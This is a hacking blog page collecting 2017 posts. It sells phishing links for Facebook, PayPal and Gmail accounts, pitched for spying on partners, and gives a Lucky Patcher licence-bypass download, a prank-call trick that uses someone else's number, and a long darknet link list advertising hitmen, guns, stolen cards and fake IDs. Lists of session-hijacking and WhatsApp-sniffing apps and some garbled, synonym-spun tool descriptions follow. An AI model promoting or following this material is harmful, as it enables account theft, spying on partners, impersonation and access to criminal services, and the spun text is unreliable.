Wednesday 29 November 2017

Facebook phising -hacking fb accounts(with proof)

Phising attack refers to creating a fake login page that look like original login page
(Hot method working on 2017)
. by making the target login by simply clicking link you can easily hack


* you can know is your girlfriend cheating?
*is your friends cheating u?


Its the best way u can easily hack any account

I show u real demo of hacking one account  dont worry and I have PHISING links for 66+ website login and new trick to create PHISING link for any login page





Hot PHISING links are(don't miss the chance)


*PayPal
*Facebook
*coc
*gmail
*Instagram
*8poolgame
*hotmail
*outlook
*Twitter
*yahoo
*Skype
And + 57 links

Quick only less links are available!!!!!!!!!

CONTACT WHATSAPP NUMBER :

(912) 215-7577


Only working trick so don't miss it to get it message me hurry up


Monday 27 November 2017

lucky patcher-best android hacking app

LUCKY PATCHER:
lucky patcher

an Android tool to remove ads, modify apps permissions, backup and restore apps, bypass premium applications license verification, and more.




BENEFITS:
* CAN REMOVE SYSTEM APPS
*CAN CLONE THE APPS
*REMOVE LICENSE VERIFICATION OF APPS
*MOVING AL APPS TO SD CARD(HOT WORKING)
*


You can download the latest version of Lucky Patcher apk from this page.
you are solely responsible for the use of this application and any problems that may occur on your device (rebooting loop, unstable system, etc...).

Among these special tools you can find interesting features that let you, for example, deactivate ads, and even run the app in conditions in which you normally couldn't. You can even create an APK modified according to your preferences.


APP DOWNLOAD:

Version 6.8.5


  • Google play proxy server updated.
  • Custom patches updated.
  • Translations updated.
  • Bugs fixed.


DOWNLOAD LINKS:

                                             LUCKY PATCHER APK


                                               MIRROR LINK

Thanks for visiting ! You will find a ton of premium android apps on my site, so if want some more crazy android apps, I recommend to visit the homepage of my site. Will love to see you again














  • Related searches


  • Wednesday 22 November 2017

    Android hacking and hidden codes(working)

    Code                                             Description

    *#*#4636#*#*             Display information about Phone, Battery and Usage statistics

    *#*#7780#*#*             Resetting your phone to factory state-Only deletes application data and applications

    *2767*3855#                 its a complete wiping off your mobile also it reinstalls the phones firmware


    *#*#34971539#*#*     Shows completes information about the camera
    *#*#7594#*#*            Changing the power button behavior-Enables direct power off once the code enabled

    *#*#273283*255*
    663282*#*#*               For a quick backup to all your media files

    *#*#19732864
    0#*#*                          Enabling test mode for service activity

    *#*#232339#*#*
    OR *#*#526#*#*        Wireless Lan Tests

    *#*#232338#*#*         Displays Wi-Fi Mac address
    *#*#1472365#*#*        For a quick GPS test

    *#*#1575#*#*             A Different type GPS test

    *#*#0283#*#*             Packet Loopback test

    *#*#0*#*#*                 LCD display test

    *#*#0673#*#*
    OR *#*#0289#*#*         Audio test

    *#*#0842#*#*              Vibration and Backlight test

    *#*#2663#*#*              Displays touch-screen version

    *#*#2664#*#*              Touch-Screen test

    *#*#0588#*#*              Proximity sensor test

    *#*#3264#*#*              Ram version

    *#*#232331#*#*           Bluetooth test

    *#*#232337#*#*           Displays Bluetooth device address

    *#*#8255#*#*               For Google Talk service monitoring
    *#*#4986*265
    0468#*#*                       PDA, Phone, Hardware, RF Call Date firmware info

    *#*#1234#*#*               PDA and Phone firmware info

    *#*#1111#*#*               FTA Software version

    *#*#2222#*#*               FTA Hardware version

    *#*#44336#*#*             Displays Build time and change list number

    *#06#                             Displsys IMEI number

    *#*#8351#*#*               Enables voice dialing logging mode

    *#*#8350#*#*               Disables voice dialing logging mode

    So Guy’s Here Is My 30 Useful Working Android Hack And Secret Codes you don’t know.I hope all of you like it most


    Kali linux for android (easy full tutorial)



    Kali Linux is one the best love operating system of white hathackers, security researchers and pentesters. It offers advanced penetration testing tool and its ease of use means that it should be a part of every security professional’s toolbox

    Installing Kali Linux in Android phone is very very easy one you need the following requirements.

    Rooted Android Device.
    Busybox Installer.
    Linux Deploy.
    Android VNC Viewer.
    4GB Free Space on your External Memory.
    High Speed Net Connection

    Steps To Install Kali Linux On Android Phone

    STEP 1:(Rooting Android Device)

    Root your android device with the given tutorial.

    STEP 2:(Installing Busybox)

     First we need to install UNIX Scripts into our device using theBusybox Installer app.Download the app from above given link and install it in your tablet linux. Open the app and follow the given steps.

     1.Choose the Busybox Version from the drop down menu.



    2.Tap the install buttom



    3.It will download the scripts to be install.



    4.After installing you will get the success message.



    Now you have successfully installed busybox in your android device.

    Note: If the installing fails you need to choose differentBusybox versions.

    STEP 3:(Configure Linux Deploy)

    Linux Deploy is the Official app to Download and install kali linux in android download the app and install it in your android. Now open the app and follow the given steps.

    1.Tap the properties icon it will opens the properties screen.





    2. In properties select the distribution to be install.



    3. Leave some setting to be default and select the desktop environment to GNOME.



    4.Select all the components in Components Menu.



    5. In GUI Settings just interchange the height and width values.



    6. Now select the install button and then OK





     7. Now the installation process starts be patient for the installation proccess to complete it takes too much of time to complete and prevent the incoming SMS and Voice Calls or Turn off the SIM and use WIFI to download because intreption of cellular data leads to cancellation of download process.



    8. I cant add the screenshot of completed process because I already did it. Now tap the START button  and tap OK it will mount the linux file



    9. Note the IP address in the top left corner of Linux deploy it changes periodically.

    STEP 4:(Configure Android vnc)

    Now open the Android VNC Viewer, Enter Nickname and password the default password for Kali Linux ischangeme nd give the IP address copied from Linux deploy for me it is 192.168.1.35 and the port is 5900 and username is android and then color is 24-bit color(4bpp). Finally tap the Connect button you will see the Kali Linux in your android device











    STEP 5:

    To close the Kali Linux, exit from the VNC viewer and then go to Linux Deploy and simply tap the Stop Button and the OK it will close the Mounted Image. You can use the Linux Penetration Testing on your android phone and it is most popular for cyber hacking






    So all of above is related to how to install Kali Linux on android phone . Hope you like this. If you have any query then comment below


    Huge List of Darknet (Deep Web) Hidden Websites

    Make sure to be secured after access.

    "I AM NOT RESPONSIBLE FOR ANYTHIMG HAPPEN TO YOU OR BE SAFE" is not bear the responsibility of any thing happened to you .. You are the only responsible to protect yourself.

    http://3g2upl4pq6kufc4m.onion/ – DuckDuckGo Search Enginehttp://xmh57jrzrnw6insl.onion/ – TORCH – Tor Search Enginehttp://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page – Uncensored Hidden

    Wiki

    http://32rfckwuorlf4dlv.onion/ – Onion URL Repositoryhttp://e266al32vpuorbyg.onion/bookmarks.php – Dark Nexushttp://5plvrsgydwy2sgce.onion/ – Seeks Searchhttp://2vlqpcqpjlhmd5r2.onion/ – Gateway to Freenethttp://nlmymchrmnlmbnii.onion/ – Is It Up?http://kpynyvym6xqi7wz2.onion/links.html – ParaZitehttp://wiki5kauuihowqi5.onion/ – Onion Wikihttp://torwikignoueupfm.onion/index.php?title=Main_Page – Tor Wikihttp://kpvz7ki2v5agwt35.onion – The Hidden Wikihttp://idnxcnkne4qt76tg.onion/ – Tor Project: Anonymity|

     Online

    http://torlinkbgs6aabns.onion/ – TorLinkshttp://jh32yv5zgayyyts3.onion/ – Hidden Wiki .Onion Urlshttp://wikitjerrta4qgz4.onion/ – Hidden Wiki – Tor Wikihttp://xdagknwjc7aaytzh.onion/ – Anonet Webproxyhttp://3fyb44wdhnd2ghhl.onion/wiki/index.php?title=Main_Page – All You’re Wiki – clone of the clean * hidden wiki that went down with freedom hostinghttp://3fyb44wdhnd2ghhl.onion/ – All You’re Basehttp://j6im4v42ur6dpic3.onion/ – TorProject Archivehttp://p3igkncehackjtib.onion/ – TorProject Mediahttp://kbhpodhnfxl3clb4.onion – Tor Searchhttp://cipollatnumrrahd.onion/ – Cipolla 2.0 (Italian)http://wvk32thojln4gpp4.onion/wiki/index.php/Main_Page – Evil Wiki — Well maintained Hidden Wikihttp://torleruteqdqqqqa.onion/ – Torle Searchhttp://dppmfxaacucguzpc.onion/ – TorDir – One of the oldest link lists on Tor Marketplace Financialhttp://torbrokerge7zxgq.onion/ – TorBroker – Trade securities anonymously with bitcoin, currently

    supports

    nearly 1000 stocks and ETFs

    http://fogcore5n3ov3tui.onion/ – Bitcoin Fog – Bitcoin Laundryhttp://2vx63nyktk4kxbxb.onion/ – AUTOMATED PAYPAL AND CREDIT CARD STOREhttp://samsgdtwz6hvjyu4.onion – Safe, Anonymous, Fast, Easy escrow service.http://easycoinsayj7p5l.onion/ – EasyCoin – Bitcoin Wallet with

    free :-

    Bitcoin Mixer

    http://jzn5w5pac26sqef4.onion/ – WeBuyBitcoins – Sell your Bitcoins for Cash (USD), ACH, WU/MG, LR, PayPal and morehttp://ow24et3tetp6tvmk.onion/ – OnionWallet – Anonymous Bitcoin Wallet and Bitcoin Laundryhttp://qc7ilonwpv77qibm.onion/ – Western Union Exploithttp://3dbr5t4pygahedms.onion/ – ccPal Storehttp://y3fpieiezy2sin4a.onion/ – HQER –

    High Quality :-

    Euro Replicas

    http://qkj4drtgvpm7eecl.onion/ – Counterfeit USDhttp://nr6juudpp4as4gjg.onion/pptobtc.html – PayPal to BitCoinshttp://nr6juudpp4as4gjg.onion/doublecoins.html – Double Your BitCoinshttp://lw4ipk5choakk5ze.onion/raw/4588/ – High Quality

    Tutorials:-

    http://ploashqjmntbulrb.onion/ – PayPalace – one of the oldest PP account seller in Onionlandhttp://usjudr3c6ez6tesi.onion – Counterfeit USD/EURhttp://matrixtxri745dfw.onion/neo/uploads/MATRIXtxri745dfwONION_130920233651JXL_GOLDMIDAS.jpg – Credit cards with pin. Take a risk and get cash.http://matrixtxri745dfw.onion/neo/uploads/MATRIXtxri745dfwONION_130922163743xKK_DRFRAUD.jpg – CARDS FOR FREEhttp://apple44jaj553thy.onion – Stolen Mac Store iPhone 5s inside!http://cthulhuuap7ch47k.onion – C’thulhu Resume – Assasination Service, When you have to have it done clean!http://rxbnonlo56vhmkk2.onion/ – The Bitcoin Laundryhttp://lmkn4jwrtb2s62yy.onion/ – The PaypalDome – Live Paypal accounts with good balances – buy some, and fix your financial situation for awhile.http://zzq7gpluliw6iq7l.onion/threadlist.php? – TGM – THE place for paypals and CC’s

    Marketplace Commercial Services:-
    http://6w6vcynl6dumn67c.onion/ – Tor Market Board – Anonymous Marketplace Forumshttp://wvk32thojln4gpp4.onion/ – Project Evilhttp://5mvm7cg6bgklfjtp.onion/ – Discounted electronics goodshttp://lw4ipk5choakk5ze.onion/raw/evbLewgkDSVkifzv8zAo/ – Unfriendlysolution – Legit hitman servicehttp://nr6juudpp4as4gjg.onion/torgirls.html – Tor Girlshttp://tuu66yxvrnn3of7l.onion/ – UK Guns and Ammohttp://nr6juudpp4as4gjg.onion/torguns.htm – Used Tor Gunshttp://ucx7bkbi2dtia36r.onion/ – Amazon Businesshttp://nr6juudpp4as4gjg.onion/tor.html – Tor Technologyhttp://hbetshipq5yhhrsd.onion/ – Hidden BetCoinhttp://cstoreav7i44h2lr.onion/ – CStore Carded Storehttp://tfwdi3izigxllure.onion/ – Apples 4 Bitcoinhttp://e2qizoerj4d6ldif.onion/ – Carded Storehttp://jvrnuue4bvbftiby.onion/ – Data-Bayhttp://bgkitnugq5ef2cpi.onion/ – Hackintoshhttp://vlp4uw5ui22ljlg7.onion/ – EuroArmshttp://b4vqxw2j36wf2bqa.onion/ – Advantage Productshttp://ybp4oezfhk24hxmb.onion/ – Hitman Networkhttp://mts7hqqqeogujc5e.onion/ – Marianic Technology Serviceshttp://mobil7rab6nuf7vx.onion/ – Mobile Storehttp://54flq67kqr5wvjqf.onion/ – MSR Shophttp://yth5q7zdmqlycbcz.onion/ – Old Man Fixer’s Fixing Serviceshttp://matrixtxri745dfw.onion/neo/uploads/MATRIXtxri745dfwONION_130827231336IPA_pc.png – PC

    Shop:-
    http://storegsq3o5mfxiz.onion/ – Samsung StorEhttp://sheep5u64fi457aw.onion/ – Sheep Marketplacehttp://nr6juudpp4as4gjg.onion/betcoin.htm – Tor BetCoinhttp://qizriixqwmeq4p5b.onion/ – Tor Web Developerhttp://vfqnd6mieccqyiit.onion/ – UK Passportshttp://en35tuzqmn4lofbk.onion/ – US Fake ID Storehttp://xfnwyig7olypdq5r.onion/ – USA Citizenshiphttp://uybu3melulmoljnd.onion/ – iLike Help Guyhttp://dbmv53j45pcv534x.onion/ – Network Consulting and Software Developmenthttp://lw4ipk5choakk5ze.onion/raw/4585/ – Quick Solution (Hitman)http://nr6juudpp4as4gjg.onion/tynermsr.htm – Tyner MSR Storehttp://lw4ipk5choakk5ze.onion/raw/5432/ – Unfriendlysolution – Legit Hitman Service (New link with current PGP key) (Can you please update, admin?) *http://abbujjh5vqtq77wg.onion/ – Onion Identity Services – Selling Passports and ID-Cards for Bitcoinshttp://2kka4f23pcxgqkpv.onion/ – EuroGuns – Your #1 european arms dealerhttp://xyt4inlajwmn3gfb.onion/ – Buy cheap iPhoneshttp://oh2s6ywmaxtgcj25.onion/store.html – Android storehttp://euhesnelvaqifqk4.onion/ – Stolen Mac Store iPhone 5s inside!http://ilike77nuoh3ummf.onion – iLike Help Guy I’d like to help you in ANY projecthttp://iacgq6y2j2nfudy7.onion – Assasination Service, The best place to put your problems is in a grave.http://3pkm74bnuxdbaxlr.onion – Cheap stolen android phones – #1 storehttp://uizxxzdowrh6rrys.onion/ – One of only two original apple discount stores on Tor. Verified & reliable, since 2011.


    Recover deleted files in simple way

    You can also recover files of android by some recovery tools. There are lots of applications available on the internet on a particular thing but how to choose best one among them ? So, today I’m sharing the top best android data recovery tools  that will help you to recover deleted files on android.

    #1 Dumpster



    The dumpster is Just like the Recycle Bin on your desktop computer. It is one of the best tools for recovering accidentally deleted files from your smart Android. It can recover all deleted files on your android. It also very easy to use because of it’s user-friendly interface. It has following features :-

    Restore deleted pictures, music files, videos and pretty much almost any file type (pdf, mp3, doc, Avi, mp4, jpg, png, rar, ogg, txt and much more:No Rooting needed but if you do, you get improved performance.No Rooting needed but if you do, you get improved performance.Internet connection absolutely not required.NEW: Recover uninstalled appsRestore Dumpster backup files with a single tap.Preview deleted photos, videos, and audio files before recovering.Send files to Dumpster using “share” or “send to” from any file manager or gallery app out there.Scheduled auto-clean of old deleted items.Protect your privacy with a special lock screen and access restriction.Note: It can recover only when it is already installed on your android before the delete of your files/data.

    #2 ES File Explorer

    The another method to restore deleted files is one of the best android file managers. This file manager is full of features and one of them is Recycle Bin. I will also recommend you to use this application as the file manager.



    You can easily find the Recycle Bin option just by opening its tool menu. You have to switch it ON to use the Recycle Bin option.

    #3 Recover Files from Android SD Card Using PC:



    Sometimes you accidentally format your SD card on you android or sometimes your SD card gets corrupted. It can recover photos and videos from SD cards on Android devices, as well as contacts and messages on SIM cards.

    With this, you can easily recover deleted files from your Android Smartphone. If you are facing any problem or need any help just comment it below I will try my best to help you.



    Posted by Shubham ;)

    Recover WiFi Passwords Using Android

    Posted: August 21, 2016 in androidhacking

    0




    When any device gets connected to wifi network then the wifi password gets saved in that device for a while till that device remains connected to that network. And in android, this wifi password gets saved in the system file which is not directly accessible to your device without having root access on your android device. So in this guide, we will be discussing same by which you can easily recover up the password of a wifi network that you had forgotten. The only requirement is that your android must be connected to that wifi network in past.

    Here we have stated two cool android apps that works only with rooted android and with that, you can actually extract out all the password are saved on your device when it gets connected to wifi network. So follow some simple steps below to proceed. The third method doesn’t need a rooted android device.

    #1 Using WiFi Key Recovery:

    Step 1. First of all, you need to root your android as the app will work only if you have root access in your device so visit the guide Root any android safely.



    Step 2. After rooting your device download and install the app Wifi Key Recovery in your android.



    Step 3. Now launch the app and you will see the popup regarding permission for super user access grant it the permission.



    Step 4. Now you will see all the wifi networks that you had connected with your android device and their passwords too along with them.

    Step 5. Now just copy the password and get login into that wifi and that’s it password will be recovered and you can now even change the password of that network by visiting the admin panel of a network.

    #2 Using  Wifi Password Recovery App

    Step 1. First of all, you need to download Wifi Password Recovery App on your rooted android smartphone.



    Step 2. After you installed it on you android device, in the very next step you need to grant the Root Permissions.



    Step 3. Now you can see all your saved wifi passwords listed with SSID Name and Pass. If you want to copy the password simply tap on the network and then select “Copy password to clipboard”

    That’s it you are done! this is the easiest way to know saved wifi passwords in your android smartphone.

    #3  Using ES File Explorer

    Step 1. First of all, you need a file explorer that gives you theread access to the root folder. If your default File manager doesn’t give you the read access to the root folder then you can install ES file Explorer .

    Now you need to head over the  data/misc/wifi folder and you will find a file named wpa_supplicant.conf.

    Step 2. You need to open the file and make sure you use ES File Explorer‘s built-intext/HTML viewer for the task. Now in this file, you will be able to see the network SSID and their passwords next to it.

    Now you need to note down the network name and its password. By this way, you can view all saved wifi passwords on the android device.

    Note: Please do not edit anything in wpa_supplicant.conf as it can alter your device working or it will have the effect on your wifi connectivity.

    So simply recover your WiFi passwords using thiese tricks. Hope you like this cool method, do share with others too.


    How to make Prank Calls Trick: Flipcall ( free calls)

    you can Make Prank calls also :D..



    So here we will use a newly launched android app calledFlipcall, which is gives Rs 60 bonus credits on Sign up. But here we will provide you a trick by which you all can call unlimited :) so follow the steps:-

    Follow the Instructions to use Flipcall:-

    1). First of all download Flipcall app from playstore or Click Here

    2). Now Signup using your mobile number and you will get $1(Rs 61) for trial purposes..

    Note: It will not ask for verification :D. So you can prank your friends also :D ..read at the end of this tutorial how to Prank your friends..

    3). Now, What you have to do is, Just make a call to any number.

    4). Now you will receive a call in which you will get connected to the number you made the call.

    5). Now just Enjoy the 120 minutes of free calling (for India). To get unlimited minutes follow the below steps..

    To get Unlimited minutes:-

    1). Now just empty your free credits by calling and when our balance becomes Rs.0 ..Go to Settings>Apps Manager>Flipcalland Clear the data.

    2). Now signup again and enjoy another $1(Rs 60) or 120 minutes(for India) :D . So you call unlimited anywhere around the world for free :D $$$$$

    Now How to Prank Anyone by Using Flipcall:-

    1). You just Simply Signup to Flipcall by using your friend’s or enemy’s number.. As I said above it will not ask for verification :D..

    2). Now make a call to your number and now you will get automatically call from your friend’s number :D
    Now your friends will be shocked :D. Prank you friends easily..


    top 10 rooted hacking apps


    Here are latest and best android hacking tools :

    *can hack fb accounts using faceniffer app(listed below)
    *can hack WhatsApp using WhatsApp sniffer(listed below)
    * can hack playstore apps without purchasing apps(using lucky patcher)




    #1 The Android Network Hacking Toolkit

    In the last Defcon conference, a new tool has been released by a security researcher and the tool is called “The Android network toolkit”. This tool has been developed for penetration tester and ethical hackers to test any network and vulnerabilities by using their mobile phones. This toolkit contains different apps that will help any hacker to find vulnerabilities and possibly exploit it. The company behind the app is an Israeli security firm called Zimperium.

    #2Nmap

    Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap was initially developed for Unix OS but now it is available on Windows and Android as well. Nmap for Android is a Nmap app for your phone! Once your scan finishes, you can e-mail the results. This application is not an official app but it looks good.

    #3faceNiff

    Your Facebook account is at risk, just like a Firesheep (for firefox hacking) there is a FaceNiff for hijacking the session of famous social networking websites includes facebook and twitter. FaceNiff is developed by Bartosz Ponurkiewicz who created Firesheep before but faceniff is for Android OS.

    #4 AnDosid

    DOS or denial of service attack is the very dangerous attack because it takes down the server (computer). AnDOSid allows security professionals to simulate a DOS attack (An HTTP post-flood attack to be exact) and of course a dDOS on a web server, from mobile phones. AnDOSid is designed for security professionals only!

    #5 shell

    Secure shell or SSH is the best protocol that provides an extra layer of security while you are connecting to your remote machine. SSHDroid is an SSH server implementation for Android. This application will let you connect to your device from a PC and execute commands (like “terminal” and “ADB shell”).

    #6hacker toolbox

    It is the best Hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc. This app contains different tools like Google Hacking, Google Dorks, Whois, Scanning etc.

    #7androrat

    AndroRAT – Remote Administration Tool for Android is a client/server application developed in Java Android for the client side and in Java/Swing for the Server. The goal of the application is to give the control of the Android system remotely and retrieve information from it.

    #8spoof

    This app simply allows users to Spoof (Place) calls with any called ID number. You can manipulate what number shows up on the person’s phone when you call. This is the app used for fun. It also includes several other features like voice changer and calls recorder too.

    #9 WhatsApp Sniffer

    WhatsApp Sniffer Android app allows Android users to receive the text messages from WhatsApp application from phones that uses the same WiFi with you (WhatsApp is totally different from WhatsApp Sniffer). It is easily detected by antivirus so better is to disable it before using this app.

    #10 APK Inspector

    It is the perfect GUI tool for analysts to analyze the Android applications. You can use this app to get the source code of any Android app and can edit it to remove licence and credits. This app will help you a lot if you need to learn and understand the coding behind apps.

    #11 Evil Operator

    As it names suggest it is an app which has lots of evil powers. The main purpose of this app to connect two people in a phone call making them feel that they called each other. The best part is it can record and save the entire conversation.

    #12 WifiKill

    With this app, you can disable internet connection for a device on the same network. So if someone (anyone) is abusing the internet wasting precious bandwidths, you could just kill their connection and stay happy with a full bandwidth just for yourself.

    #12 WifiKill

    Droidsheep is developed as a tool for testing the security of your accounts. DroidSheep is an Android app for Security analysis in wireless networks and capturing facebook, twitter, LinkedIn and other accounts.

    #14 Burp Suite

    Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

    #15 dSploit

    dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device.

    #16 zANTI

    zANTI is a mobile penetration testing toolkit that lets security managers assess the risk level of a network with the push of a button. This easy to use mobile toolkit enables IT Security Administrators to simulate an advanced attacker to identify the malicious techniques they use in the wild to compromise the corporate network

    Most Popular Hacking Tools (100% working)

    n the world of cyber security, there are many tools available on the internet, many of them are free and others are paid.

    1. Aircrack-ng



    Aircrack-ng.org is an 802.11 WEP and WPA-PSK keys breaking program that can resolve keys once enough information regarding the term stolen. It executes the standard FMS attack alongside a few improvements like KoreK breachand additionally the all-new PTW attack, in this way making the assault much quicker contrasted with other WEP splitting devices. Actually, Aircrack-ng is an arrangement of software for evaluating remote systems.

    2. sqlmap



    sqlmap is an open source infiltration testing device that robotized the procedure of recognizing and abusing SQL infusion imperfections and assuming control of database servers. Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB database management systems.

    It accompanies an effective identification program, numerous corner elements for a definitive infiltration analyzer and an expansive scope of changes enduring from database fingerprinting, over information getting from the database to getting to the basic record framework and executing orders on the working framework through an out-of-band network.

    3. John The Ripper



    John the Ripper is a free secret password cracking tool. At first it was created for the Unix working framework, it now keeps running on fifteen distinct stages (eleven of which are building design particular adaptations of Unix, DOS, Win32, BeOS, and OpenVMS).

    It is a standout amongst the most mainstream watchword testing and breaking projects as it joins various secret word wafers into one bundle, autodetects watchword hash sorts and incorporates an adjustable. It can be keep running against different scrambled secret word organizations including a few sepulcher watchword hash sorts most usually found on different Unix variants (in view of DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Extra modules have extended its capacity to incorporate MD4-based secret key hashes and passwords put away in LDAP, MySQL and others.

    4. Nmap – Network Mapper



    Nmap is a contraction of ‘System Mapper’, just like an exceptionally surely understood free open source programmers device. Nmap is utilized for system disclosure and security examining. Numerous framework administrators use nmap for system stock, open ports, overseeing administration update timetables, and observing host or administration uptime.

    The apparatus utilizes crude IP parcels as a part of innovative approaches to figure out what hosts are accessible on the system, what administrations (application name and form) those hosts are putting forth, what working frameworks (and OS renditions and conceivable patches) and what sort and form of bundle channels/firewalls are being utilized by the objective.

    Nmap keeps running on all real PC working frameworks, and authority parallel bundles are accessible for Linux, Windows, and Mac OS X. Notwithstanding the fantastic charge line Nmap executable, the Nmap suite incorporates a propelled GUI and results from viewer, an adaptable information exchange, redirection, and investigating apparatus, a utility for looking at output results, and a bundle era and reaction examination device.

    5. THC Hydra



    THC Hydra is another exemplary watchword splitting apparatus. Entirely speaking Hydra is a system login watchword splitting apparatus, which is very quick. An extraordinary element about Hydra is that you can add modules to expand the usefulness of this hacking instrument.

    When you have to savage power break a remote association administration, Hydra is regularly the instrument of a decision. It can perform fast word reference assaults against more than 50 conventions, including telnet, FTP, HTTP, https, smb, a few databases, and considerably more. Like THC Amap this discharge is from the fine people at THC. Other online wafers are Medusa and Ncrack. The Nmap Security Scanner additionally contains numerous online savage power secret key splitting modules.

    6. Burp Suite



    Burp Suite is an incorporated stage that was fabricated to assault (pentest) web applications. The stage contains many hacking devices with various GUI interfaces that encourage and accelerate the procedure of assaulting an application. As ever, the apparatus is intended to have a similar outlook as a dark cap programmer would.

    Burp Suite is a coordinated stage for performing security testing of web applications. Its different instruments work consistently together to bolster the whole testing procedure, from starting mapping and investigation of an application’s assault surface, through to discovering and misusing security vulnerabilities.

    7. Cain and Abel

    Cain and Abel (regularly abridged to Cain) is a secret key recuperation instrument for Microsoft Windows. It can recuperate numerous sorts of passwords utilizing techniques, for example, system parcel using so as to sniff, breaking different secret key hashes routines, for example, lexicon assaults, animal power, and cryptanalysis assaults.

    Cryptanalysis assaults are done by means of rainbow tables which can be created with the winrtgen.exe project gave Cain and Abel. Cain and Abel are kept up by Massimiliano Montoro and Sean Babcock. Recording VoIP discussions, translating mixed passwords, recuperating remote system keys, uncovering secret key boxes, revealing stored passwords and breaking down steering conventions.

    The system does not misuse any product vulnerabilities or bugs that couldn’t be altered with little exertion. It covers some security viewpoints/shortcoming present in convention’s norms, verification routines, and reserving components; its primary design is the disentangled recuperation of passwords and qualifications from different sources, on the other hand, it likewise sends some “no standard” utilities for Microsoft Windows clients.

    8. OWASP Zed

    The OWASP Zed Attack Proxy (ZAP) is a simple to utilize integrated penetration testing tool for finding vulnerabilities in web applications. The Zed Attack Proxy (ZAP) is currently a standout amongst the most mainstream OWASP ventures. This hacking and a pentesting instrument is an exceptionally proficient and ‘simple to use’ program that discovers vulnerabilities in web applications.

    It is intended to be utilized by individuals with an extensive variety of security experience and as being what is indicated is perfect for designers and useful analyzers who are new to entrance testing. ZAP is a mainstream device on the grounds that it has a ton of bolster and the OWASP group is truly an astounding asset for those that work in Cyber Security. ZAP gives robotized scanners and an arrangement of instruments that permits you to discover security vulnerabilities physically.

    9. Maltego

    Maltego is a computerized legal sciences stage that was made to convey a digital danger picture to the earth in which an association works. The one of a kind viewpoint that Maltego offers to both system and asset based substances is the accumulation of data posted everywhere throughout the web whether it’s the present arrangement of a switch balanced on the edge of your system or the present whereabouts of your Vice President on his global visits, Maltego can find, total and picture this data.

    Maltego is a one of a kind stage created to convey an unmistakable danger picture to the environment that an association possesses and works. Maltego’s interesting leeway is to exhibit the many-sided quality and seriousness of single purposes of disappointment and in addition trust connections that exist presently inside of the extent of your base.

    10. Metasploit

    The Metasploit is much more popular tool. Cybersecurity allows a penetration tester and hackers to use this tool, its function is to seek the security of the network with making a vulnerability along with system also. What’s more, Metasploit likewise obliges productive administration and testing of Intrusion Detection Systems.

    The most well known “division” of this ‘multi reason hacking device’ is the open source Metasploit Framework Project, ordinarily alluded to as essentially ‘Metasploit’.

    This apparatus helps the client create and execute (known or generally) adventure code against a remote target machine. Numerous Metasploit clients utilize the apparatus for hostile to criminological and avoidance purposes, a large number of which are incorporated with the Metasploit Framework.

    11. Wireshark

    Wireshark is perhaps the best known ‘Programmers Tool’ out there. Wireshark has been around for quite a while now and it is utilized by a huge number of security experts to troubleshoot and break down systems. Wireshark is a fabulous programming and correspondences convention improvementand instruction. Initially named Ethereal, in May 2006 the task was renamed Wireshark because of trademark issues. It is free and open-source parcel analyzer.

    12. Angry IP Scanner

    Angry IP Scanner on the other hand known as ipscan is an open-source and cross-stage system scanner intended to be quick and easy to utilize. It examines IP addresses and ports and has numerous different elements.

    It is generally utilized by system executives and simply inquisitive clients around the globe, including huge and little endeavors, banks and government organizations. It keeps running on Linux, Windows and Mac OS X, potentially supporting different stages too.

    13. Nessus Remote Security Scanner

    At the odd days previously this software tool is much more popular by the demand of the hacking world, currently this application source is unavailable for official but users can still use it for free, it usually works with a client-server system, it helps users to find out vulnerability, it has been used by more than  75,000 companies.

    Nessus Security Scanner is the most famous for companies, Nessus helped many big companies for analyse their business proportional audit process which is efficiently cost saving.

    14. Ettercap

    Ettercap is a free and open source system security device for man-in-the-center assaults on LAN. It can be utilized for PC system convention examination and security evaluating.

    It keeps running on different Unix-like working frameworks including Linux, Mac OS X, BSD and Solaris and on Microsoft Windows. It is equipped with blocking movement on a system section, catching passwords, and leading dynamic listening stealthily against various normal conventions.

    Ettercap meets expectations by putting the system interface into a wanton mode and by ARP harming the objective machines. Along these lines, it can go about as a ‘man in the center’ and unleash different assaults on the casualties. Ettercap has plugin bolster so that the elements can be stretched out by including new plugins.

    15. Wapiti

    Wapiti is a web application vulnerability scanner tool allows you to audit the security of your web application through scanning the application and program of the web it works “black-box” types of scanning that will scan the webpages of the deployed web app but will not study the source code of the web pages and from the web page can scan it to inject data.

    16. Nikto

    Nikto Web Scanner is a Web server scanner that tests Web servers for dangerous files/CGIs, outdated server software, and other problems. It performs generic and server types specific checks. It also captures and prints any cookies received. The Nikto code itself is Open Source (GPL), however the data files it uses to drive the program are not

    17. SuperScan

    SuperScan is a Powerful TCP port scanner, pinger, resolver. You can get improved host detection using multiple ICMP methods, TCP SYN scanning. Moreover, you will get a selection of useful tools (ping, traceroute, Whois etc)

    18. Yersini

    Yersinia is a network security/hacking tool for Unix-like operating systems, designed to take advantage of some weakness in different network protocols. Yersinia is considered a valuable and widely used security tool. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.

    19. Eraser

    Most people have some data that they would rather not share with others – passwords, personal information, classified documents from work, financial records, self-written poems and the list continues. An eraser is a security tool for windows which simply allows users to remove sensitive data from their hard drive by overwriting several times with selected patterns.

    20. Acunetix Vulnerability Scanner

    Over 70% of websites and web applications contain vulnerabilities that could lead to data theft. Acunetix used to crawl your web page and automatically analyzes all your web apps and finds perilous SQL injection, Cross site scripting and other vulnerabilities that expose your online business.


    Android pattern lock hacking (simple way)

    METHOD I:

    Solution For Everyone Before Lock Accident :

    SMS Bypass – DOWNLOAD LINK 1– Install It On Your Device (Download from attachments)
    This App Allows You To Remotely Bypass Your Phone’s Screen Lock By Sending A SMS.
    It Removes Your Gesture Pattern Or Password After Receiving A Preset Keyword Along With A Secret Code Via SMS.
    SMS Bypass App Requires Root.
    INSTRUCTIONS:

    1.First, make sure you give permanent root access to the app.

    Also see:"Root phone in 2 mins(easy method)

